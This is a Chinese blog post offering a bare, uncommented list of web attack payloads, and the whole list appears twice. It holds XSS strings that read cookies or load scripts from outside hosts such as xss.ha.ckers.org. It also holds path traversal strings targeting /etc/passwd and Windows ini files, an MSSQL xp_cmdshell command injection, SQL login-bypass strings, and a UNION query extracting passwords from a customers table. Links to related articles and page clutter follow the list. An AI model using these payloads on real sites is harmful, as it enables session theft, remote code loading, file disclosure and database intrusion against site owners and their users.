XSS跨站测试代码大全

最新推荐文章于 2019-11-07 17:59:15 发布
最新推荐文章于 2019-11-07 17:59:15 发布
阅读量360 收藏
点赞数
分类专栏: PHP 编程语言php技术
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jia28970475/article/details/52599862
版权 
'><script>alert(document.cookie)</script>  
='><script>alert(document.cookie)</script>  
<script>alert(document.cookie)</script>  
<script>alert(vulnerable)</script>  
%3Cscript%3Ealert('XSS')%3C/script%3E  
<script>alert('XSS')</script>  
<img src="javascript:alert('XSS')">  
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
%22%3cscript%3ealert(%22xss%22)%3c/script%3e  
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
%3f.jsp  
%3f.jsp  
<script>alert('Vulnerable');</script>  
<script>alert('Vulnerable')</script>  
?sql_debug=1  
a%5c.aspx  
a.jsp/<script>alert('Vulnerable')</script>  
a/  
a?<script>alert('Vulnerable')</script>  
"><script>alert('Vulnerable')</script>  
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
%3Cscript%3Ealert(document. domain);%3C/script%3E&  
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
..\..\..\..\..\..\..\..\windows\system.ini  
\..\..\..\..\..\..\..\..\windows\system.ini  
'';!--"<XSS>=&{()}  
<IMG src="javascript:alert('XSS');">  
<IMG src=javascript:alert('XSS')>  
<IMG src=JaVaScRiPt:alert('XSS')>  
<IMG src=JaVaScRiPt:alert("XSS")>  
<IMG src=javascript:alert('XSS')>  
<IMG src=javascript:alert('XSS')>  
<IMG src=javascript:alert('XSS')>  
<IMG src="jav ascript:alert('XSS');">  
<IMG src="jav ascript:alert('XSS');">  
<IMG src="jav ascript:alert('XSS');">  
"<IMG src=java\0script:alert(\"XSS\")>";' > out  
<IMG src=" javascript:alert('XSS');">  
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
<BODY BACKGROUND="javascript:alert('XSS')">  
<BODY ONLOAD=alert('XSS')>  
<IMG DYNSRC="javascript:alert('XSS')">  
<IMG LOWSRC="javascript:alert('XSS')">  
<BGSOUND src="javascript:alert('XSS');">  
<br size="&{alert('XSS')}">  
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
<LINK REL="stylesheet" href="javascript:alert('XSS');">  
<IMG src='vbscript:msgbox("XSS")'>  
<IMG src="mocha:[code]">  
<IMG src="livescript:[code]">  
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
<IFRAME src=javascript:alert('XSS')></IFRAME>  
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
<TABLE BACKGROUND="javascript:alert('XSS')">  
<DIV STYLE="background-image: url(javascript:alert('XSS'))">  
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
<DIV STYLE="width: expression(alert('XSS'));">  
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
<BASE href="javascript:alert('XSS');//">  
getURL("javascript:alert('XSS')")  
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
<XML src="javascript:alert('XSS');">  
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
<IMG src="javascript:alert('XSS')"  
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
admin'--  
' or 0=0 --  
" or 0=0 --  
or 0=0 --  
' or 0=0 #  
" or 0=0 #  
or 0=0 #  
' or 'x'='x  
" or "x"="x  
') or ('x'='x  
' or 1=1--  
" or 1=1--  
or 1=1--  
' or a=a--  
" or "a"="a  
') or ('a'='a  
") or ("a"="a  
hi" or "a"="a  
hi" or 1=1 --  
hi' or 1=1 --  
hi' or 'a'='a  
hi') or ('a'='a  
hi") or ("a"="a[/code]'><script>alert(document.cookie)</script>  
='><script>alert(document.cookie)</script>  
<script>alert(document.cookie)</script>  
<script>alert(vulnerable)</script>  
%3Cscript%3Ealert('XSS')%3C/script%3E  
<script>alert('XSS')</script>  
<img src="javascript:alert('XSS')">  
%0a%0a<script>alert(\"Vulnerable\")</script>.jsp  
%22%3cscript%3ealert(%22xss%22)%3c/script%3e  
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd  
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini  
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e  
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html  
%3f.jsp  
%3f.jsp  
<script>alert('Vulnerable');</script>  
<script>alert('Vulnerable')</script>  
?sql_debug=1  
a%5c.aspx  
a.jsp/<script>alert('Vulnerable')</script>  
a/  
a?<script>alert('Vulnerable')</script>  
"><script>alert('Vulnerable')</script>  
';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&  
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E  
%3Cscript%3Ealert(document. domain);%3C/script%3E&  
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=  
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=  
http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/http://www.cnblogs.com/etc/passwd  
..\..\..\..\..\..\..\..\windows\system.ini  
\..\..\..\..\..\..\..\..\windows\system.ini  
'';!--"<XSS>=&{()}  
<IMG src="javascript:alert('XSS');">  
<IMG src=javascript:alert('XSS')>  
<IMG src=JaVaScRiPt:alert('XSS')>  
<IMG src=JaVaScRiPt:alert("XSS")>  
<IMG src=javascript:alert('XSS')>  
<IMG src=javascript:alert('XSS')>  
<IMG src=javascript:alert('XSS')>  
<IMG src="jav ascript:alert('XSS');">  
<IMG src="jav ascript:alert('XSS');">  
<IMG src="jav ascript:alert('XSS');">  
"<IMG src=java\0script:alert(\"XSS\")>";' > out  
<IMG src=" javascript:alert('XSS');">  
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>  
<BODY BACKGROUND="javascript:alert('XSS')">  
<BODY ONLOAD=alert('XSS')>  
<IMG DYNSRC="javascript:alert('XSS')">  
<IMG LOWSRC="javascript:alert('XSS')">  
<BGSOUND src="javascript:alert('XSS');">  
<br size="&{alert('XSS')}">  
<LAYER src="http://xss.ha.ckers.org/a.js"></layer>  
<LINK REL="stylesheet" href="javascript:alert('XSS');">  
<IMG src='vbscript:msgbox("XSS")'>  
<IMG src="mocha:[code]">  
<IMG src="livescript:[code]">  
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">  
<IFRAME src=javascript:alert('XSS')></IFRAME>  
<FRAMESET><FRAME src=javascript:alert('XSS')></FRAME></FRAMESET>  
<TABLE BACKGROUND="javascript:alert('XSS')">  
<DIV STYLE="background-image: url(javascript:alert('XSS'))">  
<DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">  
<DIV STYLE="width: expression(alert('XSS'));">  
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>  
<IMG STYLE='xss:expre\ssion(alert("XSS"))'>  
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>  
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A class="XSS"></A>  
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>  
<BASE href="javascript:alert('XSS');//">  
getURL("javascript:alert('XSS')")  
a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);  
<XML src="javascript:alert('XSS');">  
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"  
<SCRIPT src="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>  
<IMG src="javascript:alert('XSS')"  
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://xss.ha.ckers.org/a.js></SCRIPT>'"-->  
<IMG src="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">  
<SCRIPT a=">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT =">" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT a=">" '' src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT "a='>'" src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<SCRIPT>document.write("<SCRI");</SCRIPT>PT src="http://xss.ha.ckers.org/a.js"></SCRIPT>  
<A href=http://www.gohttp://www.google.com/ogle.com/>link</A>  
admin'--  
' or 0=0 --  
" or 0=0 --  
or 0=0 --  
' or 0=0 #  
" or 0=0 #  
or 0=0 #  
' or 'x'='x  
" or "x"="x  
') or ('x'='x  
' or 1=1--  
" or 1=1--  
or 1=1--  
' or a=a--  
" or "a"="a  
') or ('a'='a  
") or ("a"="a  
hi" or "a"="a  
hi" or 1=1 --  
hi' or 1=1 --  
hi' or 'a'='a  
hi') or ('a'='a  
hi") or ("a"="a

余韵悠扬
关注
专栏目录
XSS测试代码大全————
11-03
XSS测试代码 安全测试 XSS测试代码大全
开发代码安全规范防SQL注入和XSS跨站攻击代码编写规范样本.doc
最新发布
08-04
开发代码安全规范防SQL注入和XSS跨站攻击代码编写规范样本 随着技术的高速发展,Web应用被广泛使用,但同时也伴随着各种安全隐患。为了提高编程人员的安全意识和安全编程经验,本规范提供了防止SQL注入和XSS跨站...
XSS测试代码大全
热门推荐
夕慕慕的博客
11-14 1万+
XSS测试代码大全 主要根据各种脚本及标签,将之转换成Unicode编码后输入。 '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3C/script%3E alert('XSS') %0a
xss测试代码
weixin_34258782的博客
02-13 128
‘><script>alert(document.cookie)</script>=’><script>alert(document.cookie)</script><script>alert(document.cookie)</script><script>alert(vulnerable)</...
XSS测试代码
abg49988的博客
03-27 345
无script的Xss <img/src=# onerror=alert('XSS')> HTML5 XSS测试代码 <video> <source onerror=”javascript:alert(1)”> 引入媒体类测试代码Example: <video onerror=”javascript:alert...
XSS跨站测试代码大全,及处理
weixin_30603633的博客
04-03 448
//跨站解决方式,处理所有用户输入【intval(),format_param()】处理:对用户输入参数进行处理//防注入函数 function clear_gpc($var){ if (get_magic_quotes_gpc()) { $var = htmlspecialchars(trim($var)); }else{ ...
开发代码安全规范-防SQL注入和XSS跨站攻击代码编写规范.pdf
07-14
【开发代码安全规范-防SQL注入和XSS跨站攻击】是针对互联网应用程序开发中的重要安全问题,旨在提升开发人员的安全编程意识,防止恶意攻击对系统和数据的破坏。SQL注入和XSS跨站脚本攻击是两种常见的网络安全威胁。 ...
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击是指攻击者利用网站没有对用户提交代码进行转义处理或者过滤不足的缺点,进而添加一些新代码,嵌入到Web页面中,使得其他用户访问都会执行相应的嵌入代码,从而盗取用户资料,利用用户身份进行某些...
开发代码安全规范-防SQL注入和XSS跨站攻击代码编写规范.docx
07-14
开发代码安全规范旨在确保软件开发过程中对SQL注入和XSS跨站攻击的防范,这是互联网应用开发中的两个重要安全问题。以下是对这两个安全威胁的详细解释以及对应的代码编写规范: **SQL注入** 是一种常见的攻击手段,...
ThinkPHP2.x防范XSS跨站攻击的方法
12-19
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本。在ThinkPHP2.x框架中,存在一个可能导致XSS攻击的风险,即当URL参数中包含恶意脚本时,ThinkPHP的异常...
xss测试代码大全javascript中的xss过滤
03-24
xss测试代码大全
代码审计--XSS跨站测试代码大全
对代码不满足,是任何真正有天才的程序员的根本特征。
12-22 1620
代码审计之----------XSS XSS又叫CSS (Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者往web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。   '>alert(document.cookie) ='>alert(document.cookie) alert(docum
XSS 跨站测试代码大全2
LIVE
11-07 1305
0x01 XSS介绍 1. XSS分类 (1) 反射型XSS、 (2)存储型XSS、 (3)Dom型XSS、 (4) 通用型XSS、(全称Universal Cross-Site Scripting,翻译过来就是通用型XSS 简称UXSS) (5) 突变型XSS ( 介绍: mXS()突变 XSS) 是当不可信数据在 DOM 的 innerHTML 属性的上下文被处理并通过浏览器发生突变,...
全面解析XSS跨站脚本攻击技术
"xss跨站脚本攻击汇总" XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户浏览器上执行恶意脚本。这些脚本可以用来窃取用户数据、操纵网页行为或者传播恶意软件。以下是一些常见的XSS攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值